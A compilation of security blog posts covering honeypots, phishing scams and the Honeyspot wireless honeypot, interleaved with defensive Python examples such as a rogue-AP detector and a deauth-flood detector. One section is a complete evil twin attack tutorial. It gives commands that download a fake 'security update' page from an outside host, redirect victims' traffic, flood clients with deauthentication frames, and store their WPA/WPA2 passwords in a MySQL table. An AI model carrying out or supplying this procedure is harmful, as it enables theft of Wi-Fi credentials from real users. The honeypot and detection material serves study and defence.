How can we Define a Honeypot?


How can we define honeypots?

A honeypot is essentially a computer system containing files and directories like any ordinary system. Its purpose is to lure an attacker into a trap so that his actions can be investigated and his behavior followed. A honeypot is not a real production system; it is a decoy. What distinguishes a honeypot from other security systems is that a variety of security problems can be tackled at once using the diverse approaches honeypots make available, whereas a conventional security system addresses one specific problem with one proposed solution. A simple instance of this: once a log of malicious activity exists, a compromised system can be investigated from it. At the same time, new threats can be recognized by deploying a honeypot in a network, and the problems they reveal can then be tackled and overcome effectively.

To an outside attacker, honeypots are indistinguishable from the actual production servers, so attackers will not behave any differently when attacking them. The network security team, however, can monitor the honeypots for recorded attacks and analyze them later. Honeypots can also help absorb attacks directed against the real server.
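The definition above is easier to grasp with a concrete decoy. The following is an added example, not code from the original post: a minimal low-interaction TCP honeypot that listens on a decoy port, greets each client with a banner, records who connected and what they sent as one JSON line per event, and summarizes the log by source address. The port, log path and banner are assumptions chosen for the illustration.

```python
import json
import socket
import threading
from datetime import datetime, timezone

# Assumptions for this illustration (not from the original post):
DECOY_PORT = 2222                       # a decoy port nothing legitimate listens on
LOG_PATH = "honeypot-events.jsonl"      # one JSON object per line, appended
BANNER = b"SSH-2.0-OpenSSH_7.4\r\n"     # a plausible greeting so probes keep talking
MAX_CAPTURE = 512                       # bytes of client data kept per event


def build_event(peer, payload, now=None):
    """Turn one connection into a JSON-serialisable record.

    Control characters and non-ASCII bytes are escaped so the log stays
    readable and cannot smuggle terminal control sequences to whoever
    reviews it later.
    """
    now = now or datetime.now(timezone.utc)
    ip, port = peer
    kept = payload[:MAX_CAPTURE]
    return {
        "ts": now.isoformat(),
        "src_ip": ip,
        "src_port": port,
        "dst_port": DECOY_PORT,
        "bytes": len(payload),
        "truncated": len(payload) > MAX_CAPTURE,
        "data": kept.decode("latin-1").encode("unicode_escape").decode("ascii"),
    }


def handle_client(conn, peer, log_path=LOG_PATH):
    """Serve one connection: send the banner, capture what arrives, log it."""
    conn.settimeout(5.0)
    try:
        conn.sendall(BANNER)
        payload = conn.recv(4096)
    except (socket.timeout, OSError):
        payload = b""
    finally:
        conn.close()
    event = build_event(peer, payload)
    with open(log_path, "a", encoding="utf-8") as fh:
        fh.write(json.dumps(event) + "\n")
    return event


def serve(port=DECOY_PORT):
    """Accept connections forever; each client is handled on its own thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(16)
    while True:
        conn, peer = srv.accept()
        threading.Thread(target=handle_client, args=(conn, peer), daemon=True).start()


def summarize(log_lines):
    """Count events per source address from JSON log lines.

    Returns (src_ip, count) pairs, busiest first, so an analyst sees at a
    glance which addresses keep poking the decoy.
    """
    counts = {}
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        counts[event["src_ip"]] = counts.get(event["src_ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    serve()
```

Because nothing legitimate should ever talk to the decoy port, every logged event is a signal rather than noise; the escaping in `build_event` matters because attacker-supplied bytes end up in a file an analyst will open.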


What is the motivation behind a honeypot?

The honeypot idea is derived mainly from a deep interest in the field of computer security. Implementing a honeypot requires an interest in the workflow of security systems, solid knowledge of how a company's protection can be achieved, and an understanding of how risky security flaws in one system can be for the entire system and organization. A network administrator should be ready for a great deal of work when implementing a honeypot system in a network. A crucial preliminary step is being aware of the system and network architecture and of the modifications that could be applied to them. The output is examined with reliable forensic tools. Along the way, several problems will be encountered, and the administrator has to make sure he can solve them before putting the honeypot into the system. Facing such problems beforehand matters: it ensures that later, even under intense conditions, the system can be handled quickly and losses recovered easily. Good knowledge of examining security problems and of forensic science is therefore a must.


What should be done before applying a honeypot to the real production system?

A network administrator should carry out some research as soon as he considers applying the honeypot concept in his network. He has to be sure that the honeypot is secured so that it has no leaks into the actual system; otherwise it will cause a real disaster. He also has to make sure that an attacker has no way of knowing he has been trapped in a honeypot, and he has to know the maximum amount of information the honeypot implementation can expose to an attacker. It is also worth knowing how an attacker behaves once he realizes he is in a trap: will he simply give up and stop? Finally, a network administrator should know where in the network the honeypot should be deployed and how much information he can expect to get from it.

Laws play a role in everything, so a network administrator should also be aware of the restrictions that apply to implementing honeypots, especially if his organization is in the European Union (EU) or the United States of America (USA). Certain rules and regulations govern the process of obtaining information about an attacker or tracking him back. A network administrator should therefore abide by these rules, not fully tracking the attacker and respecting the law in every way.

What is the description of our problem?

When we build a good honeypot, we expect to attract several attackers into the fake system and let them take control of the intentional flaws left in it. When we trace the attacker, there is no guarantee that we are the ones in control, so we do not know that much about the security of the honeypot itself. We are not sure whether the attacker knows it is a fake system, or whether he is aware of how valuable information about the system's flaws is. We need to be very specific and certain about the actual limits an attacker has once he gains control of the honeypot system. It would be disappointing if the attacker could exploit the honeypot itself, seizing on a flaw in it to reach the real system and do what he wants there; at that devastating point the entire system is compromised. Another problem is that an attacker may recognize the trap and then stop, or merely pretend to keep hacking. From that moment the installed honeypot is no longer beneficial, and using our forensic tools to investigate the system is no longer useful either. A very important aspect of using honeypots is to be sure of the answers to all these questions, to make our honeypots more secure, and to be assured that an attacker hacking the honeypot will gain no useful data about the actual system. A good network administrator should play the role of a hacker on one occasion and of a forensic examiner on another, or do both at the same time together with his team. Very accurate results can be obtained depending on the various tools used for hacking and forensics.


Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

How can you Create an Evil Twin Access Point?


Quick intro to Evil Twin:

What is an evil twin access point? When it comes to security, and Wi-Fi security in particular, the name comes up often. Basically, an attacker imitates a real Wi-Fi access point in order to collect data from whoever attempts to access the network.

Installing a Wi-Fi access point with the same name and settings as another access point, and positioning it next to the impersonated one, will most likely cause the victim user to fall into the trap. Since the two access points become twins, identical twins so to speak, the user can hardly distinguish between them and will try to connect to the evil access point as if it were the original. This is because the signal strengths may be similar, or at times the evil access point may even have the stronger signal.

There are two cases: either the user's device connects automatically to an access point, in this case the evil one, or the user manually chooses the stronger access point, perceiving it as the nearer one. In both cases, all the user's sensitive data, such as passwords, is intercepted by the attacker.
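The three properties the paragraphs above describe (same name as a trusted AP, a different radio, often a stronger signal and a different security mode) are exactly what a network owner can check for. The following is an added example, not code from the original post, of a rogue-AP check over scan results: it flags any access point advertising a managed ESSID from a BSSID outside the owner's baseline. The scan-record format and the baseline of trusted BSSIDs are assumptions; a real deployment would fill the baseline from its own access-point inventory.

```python
# Added example (not from the original post). The scan-record format and the
# baseline of trusted BSSIDs are assumptions for the illustration.

TRUSTED_APS = {                      # constructed baseline: ESSID -> trusted BSSIDs
    "CorpWiFi": {"00:11:22:33:44:55", "00:11:22:33:44:56"},
}

SAMPLE_SCAN = [                      # constructed scan results (signal in dBm)
    {"essid": "CorpWiFi",   "bssid": "00:11:22:33:44:55", "channel": 6,  "signal": -58, "security": "WPA2"},
    {"essid": "CorpWiFi",   "bssid": "00:11:22:33:44:56", "channel": 11, "signal": -64, "security": "WPA2"},
    {"essid": "CorpWiFi",   "bssid": "de:ad:be:ef:00:01", "channel": 6,  "signal": -35, "security": "OPEN"},
    {"essid": "CoffeeShop", "bssid": "aa:bb:cc:dd:ee:ff", "channel": 1,  "signal": -70, "security": "OPEN"},
]


def find_evil_twins(scan, trusted=TRUSTED_APS):
    """Return one finding per AP that advertises a managed ESSID from an unknown BSSID.

    Each finding lists why it is suspicious: the BSSID is not in the baseline,
    and optionally the security mode differs from the trusted APs' or the
    signal is stronger than any trusted AP (both traits the text above
    describes for the evil twin).
    """
    by_essid = {}
    for ap in scan:
        by_essid.setdefault(ap["essid"], []).append(ap)

    findings = []
    for essid, aps in by_essid.items():
        if essid not in trusted:
            continue                                   # not a network we manage
        good = {b.lower() for b in trusted[essid]}
        legit = [a for a in aps if a["bssid"].lower() in good]
        legit_modes = {a["security"] for a in legit}
        strongest_legit = max((a["signal"] for a in legit), default=None)

        for ap in aps:
            if ap["bssid"].lower() in good:
                continue
            reasons = ["BSSID not in the trusted baseline for this ESSID"]
            if legit_modes and ap["security"] not in legit_modes:
                reasons.append("security mode %s differs from trusted %s"
                               % (ap["security"], "/".join(sorted(legit_modes))))
            if strongest_legit is not None and ap["signal"] > strongest_legit:
                reasons.append("signal %d dBm is stronger than any trusted AP (%d dBm)"
                               % (ap["signal"], strongest_legit))
            findings.append({"essid": essid, "bssid": ap["bssid"],
                             "channel": ap["channel"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_evil_twins(SAMPLE_SCAN):
        print(finding["essid"], finding["bssid"], "ch", finding["channel"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Run periodically from a monitoring host with a wireless card, this turns the "identical twins" problem into an inventory question: the user cannot tell the two apart, but the owner knows which BSSIDs it deployed.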

What do you need to set up an evil twin access point?

To be able to set up an evil twin access point, there are four main requirements:

  1. Have Kali Linux installed on your machine.
  2. Have a Wireless Network adapter.
  3. Have your machine connected to the Internet.
  4. Have a target access point.

What are the steps to accomplish the desired task?

The following steps are a concise way to get an evil twin access point prepared for an attack:

  1. Open your Kali Linux machine and log in.
  2. Establish the Internet connection between your machine and the host machine.
  3. Install a DHCP server on your machine: open the terminal and type “apt-get install dhcp3-server”.
  4. After the installation completes successfully, configure the DHCP server with the following command:

“nano /etc/dhcpd.conf”

A blank file should get opened into the terminal right away after executing this command.

  5. Inside the blank file, type the following lines exactly as they are:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.1.130 192.168.1.140;
}

  6. Save the file by pressing ctrl+x and then ‘y’.
  7. Download the security update page; this is the page that appears when the user opens the browser. To do this, change the directory to /var/www with the following command:

“cd /var/www”

  8. Now that you have changed the working directory, type the following commands in this order:

rm index.html
wget http://hackthistv.com/eviltwin.zip
unzip eviltwin.zip
rm eviltwin.zip

  9. Start the Apache server and MySQL. The following commands, respectively, do this:

/etc/init.d/apache2 start
/etc/init.d/mysql start

  10. Create a database to store the users’ WPA/WPA2 passwords when they enter them on the security update page. The following commands do this:

mysql -u root
create database evil_twin;
use evil_twin
create table wpa_keys(password varchar(64), confirm varchar(64));

Do not close the MySQL terminal after this step.

  11. Find the interface name of the local network adapter and the local IP. Open a new, separate terminal and type the following commands in it:

ip route
airmon-ng
airmon-ng start wlan0
clear

In the output of the first command, take note of the local IP and the wired interface: the interface name is the one shown as “eth0”, and the local IP is the address that appears after “src”.

  12. Type the following commands now:

airodump-ng-oui-update
airodump-ng -M mon0
airbase-ng -e [ESSID] -c [ch. #] -P mon0

After the second command, take note of the target’s ESSID, BSSID and channel number, which all appear in its output. In the third command, [ESSID] is your target’s ESSID and [ch. #] is the target’s channel number you noted after the previous command.

  13. The evil access point is now running. However, we still need to configure our tunnel interface to create a bridge between the evil twin access point and the wired interface. The tunnel interface is named at0; it was created when we ran airbase-ng in the previous step. To make these configurations, open a new, separate terminal without closing either the MySQL or the airbase terminals, and type the following command in it:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

  14. A route has to be added now and IP forwarding enabled, so that traffic can flow into and out of our evil access point. Type the following commands in order:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [LOCAL IP ADDRESS]:80
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

  15. Perform a de-authentication attack now. This forces all the connected clients to connect to the evil twin access point. First, create a blacklist file containing the BSSID of the target; the following commands do this, where [BSSID] is the BSSID of the target and [CH.#] is its channel number:

echo [BSSID] > blacklist
mdk3 mon0 d -b blacklist -c [CH.#]

  16. Go back to the airbase terminal; there you can see whether a user has connected to the evil twin access point. By then he will have entered his WPA/WPA2 password. To view it, go back to the MySQL terminal and type the following commands; the second one shows the passwords the victim entered, as stored in our MySQL database:

use evil_twin
select * from wpa_keys;

  17. Congratulations! You have created the evil twin access point successfully.
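The de-authentication step in the procedure above is also its most visible side: a burst of deauthentication or disassociation frames aimed at the broadcast address is something a wireless IDS can count. The following is an added example, not code from the original tutorial, of that detection: it keeps a sliding window of disconnect frames per BSSID over parsed monitor-mode records and raises one alert when the window fills. The record format, the constructed sample capture, and the window and threshold values are assumptions.

```python
from collections import deque

# Constructed frame records: what a monitor-mode capture would yield after
# parsing (timestamp in seconds, management subtype, addresses). The format,
# the sample data and the thresholds are assumptions for this example.
BROADCAST = "ff:ff:ff:ff:ff:ff"
DISCONNECT_SUBTYPES = {"deauth", "disassoc"}


def sample_frames():
    """Build a small capture: normal traffic plus a burst of broadcast deauths."""
    frames = []
    for i in range(8):                       # ordinary data frames every second
        frames.append({"ts": float(i), "subtype": "data", "src": "00:11:22:33:44:55",
                       "dst": "aa:bb:cc:00:00:01", "bssid": "00:11:22:33:44:55"})
    for i in range(40):                      # 40 deauths in 4 s, all to broadcast
        frames.append({"ts": 3.0 + i * 0.1, "subtype": "deauth", "src": "00:11:22:33:44:55",
                       "dst": BROADCAST, "bssid": "00:11:22:33:44:55"})
    for i in range(3):                       # sparse unicast disassocs on another network
        frames.append({"ts": 100.0 + i * 30, "subtype": "disassoc", "src": "66:77:88:99:aa:bb",
                       "dst": "aa:bb:cc:00:00:09", "bssid": "66:77:88:99:aa:bb"})
    return frames


def detect_deauth_flood(frames, window_s=10.0, threshold=20):
    """Flag any BSSID that emits >= threshold deauth/disassoc frames within window_s.

    A sliding window of timestamps is kept per BSSID; one alert is raised per
    BSSID the first time the window fills. Broadcast destinations are counted
    separately because a flood aimed at every client at once is the signature
    of the attack described above.
    """
    windows = {}
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda x: x["ts"]):
        if f["subtype"] not in DISCONNECT_SUBTYPES:
            continue
        q = windows.setdefault(f["bssid"], deque())
        q.append((f["ts"], f["dst"] == BROADCAST))
        while q and f["ts"] - q[0][0] > window_s:
            q.popleft()
        if len(q) >= threshold and f["bssid"] not in alerted:
            alerted.add(f["bssid"])
            alerts.append({
                "bssid": f["bssid"],
                "count": len(q),
                "window_start": q[0][0],
                "window_end": f["ts"],
                "broadcast_frames": sum(1 for _, is_bcast in q if is_bcast),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_frames()):
        print("deauth flood from", alert["bssid"], "-", alert["count"],
              "frames between", alert["window_start"], "and", alert["window_end"])
```

The threshold must be tuned per environment: access points do send occasional deauth frames legitimately (the three sparse disassocs in the sample never trip the detector), so the point is the rate, not the presence, of disconnect frames.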


Sources:

www.hacking-tutorial.com/hacking-tutorial/how-to-create-evil-twin-access-point/

How to understand phishing scams?


So, what about phishing scams?

Phishing is one of the most common social engineering attacks, and it has been on the rise lately.

The following list gives a few social engineering scams executed via phishing:

  1. Banking Link Scam:

Someone could easily send you an email that tricks you into revealing vital information about yourself. One may even send you a phony link to your bank, so that you believe your real bank sent it, and you are then tempted to enter your username and password. In 2015, a campaign named Carbanak was able to get around a billion dollars from over 30 countries, as found by Kaspersky. That is phishing.

What precisely happened is that the campaign relied heavily on spear phishing. As a result, workstations were infected with the help of the banks' own employees. The hackers were then able to tunnel deeper into the bank's systems, taking control of employee workstations. This allowed them to transfer cash, operate ATMs remotely, change the information on various accounts, and play other tricks with the records.

The problem originated primarily from a phishing email sent to some employees as if one of their colleagues had sent it. Behind the scenes, however, there was malicious code, and from there it was able to spread widely. Meanwhile, everything that happened on the victims' machines was recorded by the attackers for future use. When the time came, the attackers understood everything in the system and knew what went where. This made it easy for them to carry out several transactions, among them the ATM hits. In addition, they inflated bank balances and then siphoned off the difference, so that a customer's account balance might go from $20,000 to $100,000, with the $80,000 being the hacker's earnings.

  2. Fax Notice Scam:

It is nothing more than a phony link to a fake fax, but the damage it does to your computer is enormous. This type of scam appears especially in dealings with companies that rely substantially on faxes: document management firms, title companies, and insurance and other financial services companies.

  3. Dropbox Link Scam:

Even Dropbox has had its share of scams. Several security incidents occurred during 2014. In one case, a phishing email was sent to victims asking them to click on a fake link to reset their Dropbox password. The link led users to a page showing a browser warning that their browser was out of date and needed updating, with a button to run the update. Pressing it triggered a Trojan from the Zeus family of malware. In another phishing attack that used Dropbox, emails containing Dropbox links were sent to victims; clicking such links installed malicious software such as the “CryptoWall” ransomware.

  4. Court Secretary Complaint Link Scam:

This is another phony link that hackers use to trick a customer who falls victim to phishing. It is a link that supposedly confirms a customer's complaint. For instance, a phishing email of this sort may include a kind of prediction that a consumer is about to complain about something. The sender attempts to learn the customer's problems in order to exploit them further. This kind of phishing was in fact very common for quite some time.

  5. Facebook Message Link Scam:

This type of phishing trick mainly appears around the time of a celebrity's death. A link is sent through Messenger or shared through various pages, and a click on the proposed link is enough to compromise the computer.

One vivid example occurred when Robin Williams died. A phishing message spread widely on Facebook, tempting users to open a link to watch a Robin Williams goodbye video. The message was made even more convincing by embellishing the link's title to indicate that it was an exclusive video of Williams saying goodbye on his cell phone. When users clicked the link, it took them to a bogus BBC web page containing nothing but bad links leading to scam online surveys.

How does an attacker attract more victims to the counterfeit website?

There are many methods an attacker uses to get more victims to visit the fake website. Among them are the following four tricks:

  1. The attacker shortens the phishing URL as much as possible.
  2. The URL is shared repeatedly on social platforms such as WhatsApp and Viber. People are more likely to follow phishing links there because there is no shared awareness of computer security among the users of these social groups.
  3. Many rely mostly on social engineering here, so that people fall into the trap and open the links.
  4. The attackers send URLs to victims through emails, especially under female names.
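The scams above share a handful of URL-level tells: a shortened link that hides its destination, a bank's name placed in a hostname or path that is not the bank's domain, and a link that is not what it appears to be. The following is an added example, not code from the original post, of a triage function that checks a URL for those tells and returns the reasons it found. The brand-to-domain mapping and the shortener list are constructed for the illustration; a real deployment would use its own inventory, and the registrable-domain helper is deliberately approximate.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed lists for the illustration: a real deployment would use the
# organisation's own brand/domain inventory and a maintained shortener list.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly"}
PROTECTED_BRANDS = {"mybank": "mybank.example"}   # brand keyword -> legitimate domain


def registrable_domain(host):
    """Approximate the registrable domain as the last two labels.

    Good enough for the illustration; production code would consult the
    Public Suffix List so that suffixes such as co.uk are handled correctly.
    """
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def triage_url(url, brands=PROTECTED_BRANDS, shorteners=SHORTENERS):
    """Return the reasons a URL looks like a phishing link (empty list = none found)."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    path = parts.path.lower()
    reg = registrable_domain(host)
    reasons = []

    # "user@host" trick: everything left of '@' is ignored by the browser
    if parts.username is not None:
        reasons.append("userinfo before '@': text left of '@' is not the destination host")
    # bare IP hosts are rare for real brands and hide who owns the server
    try:
        ipaddress.ip_address(host)
        reasons.append("host is a bare IP address")
    except ValueError:
        pass
    # item 1 above: a shortened link hides the real destination
    if host in shorteners:
        reasons.append("link shortener hides the real destination")
    if host.count(".") >= 4:
        reasons.append("unusually deep subdomain chain")
    # the "phony link to your bank": brand name present, brand domain absent
    for brand, legit in brands.items():
        if reg == legit:
            continue
        if brand in host.replace("-", ""):
            reasons.append("brand '%s' appears in host but domain is %s" % (brand, reg))
        elif brand in path:
            reasons.append("brand '%s' appears in path of unrelated domain %s" % (brand, reg))
    if parts.scheme != "https":
        reasons.append("not HTTPS")
    return {"url": url, "host": host, "registrable_domain": reg, "reasons": reasons}


if __name__ == "__main__":
    for sample in ["https://mybank.example/login",
                   "http://mybank.example.secure-verify.test/login",
                   "http://mybank.example@evil.test/login",
                   "http://bit.ly/3abc"]:
        result = triage_url(sample)
        print(sample, "->", result["reasons"] or ["no findings"])
```

A shortened link is not malicious in itself; the check only says that the destination cannot be judged until it is expanded, which is precisely why attackers shorten them.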


Sources

https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack


What is Honeyspot?


What are Wireless Honeypots?

There is another type of honeypot system that is also commonly used: the wireless honeypot. Deploying a wireless honeypot in a network is mainly done to capture the behavior of a system that resides inside a wireless network. Information and statistics about such behavior and activities can easily be gathered from these honeypots. Wireless connections include the IEEE 802.11 technology as well as similar technologies such as Bluetooth.

Why do we use Wi-Fi honeypots?

We use Wi-Fi honeypots basically to track any malicious activity on the target network. To elaborate, a few access points, a wired network, and some open-to-attack computers are enough to obtain a Wi-Fi structure. In such a structure, Wi-Fi networks are vulnerable to enormous numbers of attacks, which creates the need for a Wi-Fi honeypot capable of capturing any unauthorized traffic and answering questions about the possibility of catching wardrivers and hackers who are gathering their forces to attack and compromise a wireless network.

What is Honeyspot?

Honeyspot is the name of a wireless honeypot project that was originally supported by the Spanish Honeynet Project. It is considered the most famous of the wireless honeypot projects. Its odd name comes from the two terms honeypot, the basic idea behind wireless honeypots, and hotspot, the basic idea of a wireless network.

The rationale behind the Honeyspot project is basically to monitor an attacker while he acts maliciously against a wireless network, in order to learn his behavior and actions. The only traffic passing through such a honeyspot is malicious traffic. On the other hand, just as any professional and experienced attacker can identify whether a system is real or a fake honeypot, equally experienced attackers can distinguish a honeyspot from a real system. How a honeyspot appears therefore matters in convincing the majority of attackers that it is a real system: there should be many similarities between the real system and the honeyspot system.

The aim the Honeyspot team had in mind was to understand attack types, the ideas an intruder has about the system, his logic, and how he approaches the system for his purposes. The benefit of gathering so much information about an attack is huge: the attack can be fully identified, and similar attacks prevented in the future. Using the collected data, it becomes easy to understand the many flaws of WEP wireless connections, how attackers think about them, and how they try to exploit such vulnerabilities. IP address spoofing, web session hijacking, and MAC address spoofing all become recognizable and identifiable with the Honeyspot project, as do the special approaches used to hack the clients of a wireless network. The result of all this information and understanding is that much more secure systems become achievable.

There is a special network architecture that works best with the Honeyspot project.

The architecture consists of the following components:

  1. There has to be a Wi-Fi access point (WAP) to which clients can connect; an attacker is also able to connect to it. The WAP is the main source of Internet connectivity for all its clients.
  2. There are the wireless clients (WC), which appear to be ordinary users of the network that gain Internet access through the WAP. None of these clients are real devices, yet they can connect to the honeyspot network. If they are not real, why have them at all? The basic answer is that we need to create traffic in the fake system: we want to show the attacker incoming and outgoing traffic passing through the wireless honeyspot. This gives the attacker the sense that he is attacking a real system rather than a fake one, and so tempts him to attack the network, starting by monitoring that traffic with the monitoring tools he uses for the attack.
  3. There is also the wireless monitor module (WMON). This module captures traffic so that any information about the network traffic can be retrieved and monitored. It helps security administrators understand the attacks and gather information about them, which shows how important this module is.
  4. Another module, the wireless data analysis module (WDA), depends on the work of WMON in the first place. It assists the administrators in analyzing the captured traffic, which is why it relies so heavily on WMON: while WMON captures the data, WDA analyzes and examines it. The mechanism is as follows: when WMON captures traffic records, it saves them and sends them directly to WDA, which makes sense of the traffic by analyzing it to extract important information.
  5. Finally, the last module is the WI module. This is a wired structure that is optional in the Honeyspot architecture, meaning it may or may not be present without causing any problems. The idea is that the network may be designed with a wired connection structure as well as the wireless one, which gives a slightly different aspect to the usual Honeyspot network structure.
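The WMON-to-WDA hand-off described in items 3 and 4, together with the earlier remark that MAC address spoofing becomes recognizable, can be shown end to end. The following is an added example, not code from the Honeyspot project: a toy WMON that forwards captured frame records to a WDA, and a WDA that applies one analysis, spotting a spoofed station MAC through 802.11 sequence-number discontinuities (a genuine station increments its 12-bit sequence counter in small steps, so two transmitters sharing one address produce interleaved counters with large jumps). The record format, the constructed capture, and the gap threshold are assumptions; the heuristic itself is a well-known one and not something the page attributes to Honeyspot.

```python
# Added example (not from the Honeyspot project). Record format, sample
# capture and the max_gap threshold are assumptions for this illustration.

SEQ_MODULUS = 4096          # 802.11 sequence numbers are 12 bits wide


class WDA:
    """Wireless data analysis: consumes frame records, emits alerts."""

    def __init__(self, max_gap=64):
        self.max_gap = max_gap
        self.last_seq = {}      # src MAC -> last sequence number seen
        self.alerts = []

    def analyze(self, frame):
        src, seq = frame["src"], frame["seq"]
        prev = self.last_seq.get(src)
        if prev is not None:
            gap = (seq - prev) % SEQ_MODULUS
            # gap 0 with the retry flag is a normal retransmission; anything
            # else that goes backwards (large modular gap) or leaps forward
            # suggests a second transmitter using the same address.
            retransmit = bool(frame.get("retry")) and gap == 0
            if not retransmit and (gap == 0 or gap > self.max_gap):
                self.alerts.append({"src": src, "ts": frame["ts"],
                                    "prev_seq": prev, "seq": seq, "gap": gap})
        self.last_seq[src] = seq


class WMON:
    """Wireless monitor: captures frames and forwards them to the analyser."""

    def __init__(self, analyzer):
        self.analyzer = analyzer
        self.captured = 0

    def capture(self, frames):
        for frame in sorted(frames, key=lambda f: f["ts"]):
            self.captured += 1
            self.analyzer.analyze(frame)


def sample_capture():
    """Constructed capture: a genuine station (seq 100..) and a spoofer that
    reuses its MAC with its own counter (seq 2000..), interleaved in time."""
    real = "00:11:22:33:44:55"
    other = "66:77:88:99:aa:bb"
    return [
        {"ts": 0.0, "src": real,  "seq": 100},
        {"ts": 0.1, "src": real,  "seq": 101},
        {"ts": 0.2, "src": other, "seq": 7},
        {"ts": 0.3, "src": real,  "seq": 2000},                 # spoofer
        {"ts": 0.4, "src": real,  "seq": 102},
        {"ts": 0.5, "src": real,  "seq": 2001},                 # spoofer
        {"ts": 0.6, "src": real,  "seq": 103},
        {"ts": 0.7, "src": real,  "seq": 103, "retry": True},   # benign retransmission
        {"ts": 0.8, "src": other, "seq": 8},
    ]


def run_pipeline(frames, max_gap=64):
    """Feed frames through WMON into WDA and return WDA's alerts."""
    wda = WDA(max_gap=max_gap)
    WMON(wda).capture(frames)
    return wda.alerts


if __name__ == "__main__":
    for alert in run_pipeline(sample_capture()):
        print("possible MAC spoofing:", alert["src"], "seq", alert["prev_seq"],
              "->", alert["seq"], "(gap", alert["gap"], ") at t=", alert["ts"])
```

Every alert here names the genuine station's address, which is the point: the spoofer is invisible by address alone, and only the analysis module, fed by the monitor, exposes the second transmitter.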


Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf